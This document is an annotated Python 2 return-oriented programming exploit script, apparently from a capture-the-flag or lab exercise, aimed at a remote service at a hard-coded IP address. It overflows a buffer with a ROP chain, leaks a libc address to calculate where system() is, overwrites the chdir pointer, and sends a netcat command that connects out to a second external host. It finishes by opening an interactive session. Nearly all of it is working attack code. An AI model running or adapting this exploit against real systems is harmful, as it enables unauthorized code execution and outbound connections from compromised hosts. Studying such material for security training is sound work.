ROP
# Python 2 script (print statements, zio I/O) that talks to one hard-coded
# remote host and sends it a fixed, address-dependent payload.  Every
# address and offset below is a literal tied to one specific binary and
# libc build; nothing here is discovered at runtime except the 4-byte value
# read back at the end.  The fixed target IP, the static addresses and the
# literal command string are the artefacts a reviewer or an analyst would
# key on when classifying this traffic.
import time  # not used in this script
import struct
from zio import *  # zio is a third-party I/O helper, not stdlib
io = zio(('166.111.132.132', 1234))
#io = zio(('localhost', 1234))
# Passed as zio's read timeout below; the unit is zio's, not documented here.
timeout = 1000 * 1000
# Static addresses in the target binary (names are the author's; no
# symbol table is on hand to confirm them).
buf = 0x0804a10c
recv_addr = 0x080489e6
sendlen_addr = 0x08048a61
chdir_plt_addr = 0x08048680
chdir_ptr = 0x804a218
# One base gadget address plus small offsets into it; the names suggest
# successively shorter pop-sequences ending in ret.
ppppr_addr = 0x8048e68
pppr_addr = ppppr_addr + 0x1
ppr_addr = ppppr_addr + 0x2
pr_addr = ppppr_addr + 0x3
# Fixed offsets of two functions inside one particular libc build; only
# their difference is used, so the leaked address of one yields the other.
chdir_libc_addr = 0x000ddf30
system_libc_addr = 0x0003ea70
system_chdir_diff = system_libc_addr - chdir_libc_addr
# 268 filler bytes followed by a sequence of 32-bit values.  struct 'i' is
# native byte order and signed: this only matches the target's layout on a
# little-endian 32-bit build, and values above 0x7fffffff would fail to pack.
payload = 'a' * 268 + \
''.join(map(
lambda x: struct.pack('i', x)
, [
recv_addr,
pr_addr,
buf,
sendlen_addr,
ppr_addr,
chdir_ptr,
4,
recv_addr,
pr_addr,
chdir_ptr,
chdir_plt_addr,
0xfffffff,
buf
]))
a = io.readline()
print a
io.writeline(payload)
# Presumably drains the service's reply before the next write; 293 is a
# magic count taken from the target's output -- verify against it.
io.read(293, timeout=timeout)
# Literal command string sent to the target; it names a second fixed
# host:port for an outbound connection.
io.writeline('echo xxx | nc 183.173.136.104 8080')
# The 4 bytes read back are interpreted as a signed native int; because
# system_chdir_diff is a plain difference, a negative (signed) value still
# gives the right result as long as the pack below stays in range.
addr = io.read(4, timeout=timeout)
print
addr = struct.unpack('i', addr)[0]
print hex(addr)
system_addr = addr + system_chdir_diff
print hex(system_addr)
# Second payload: just the derived address, same native signed packing.
payload = struct.pack('i', system_addr)
io.writeline(payload)
io.read(timeout=timeout)
# Hands the connection over to the terminal (zio's interactive mode).
io.interact()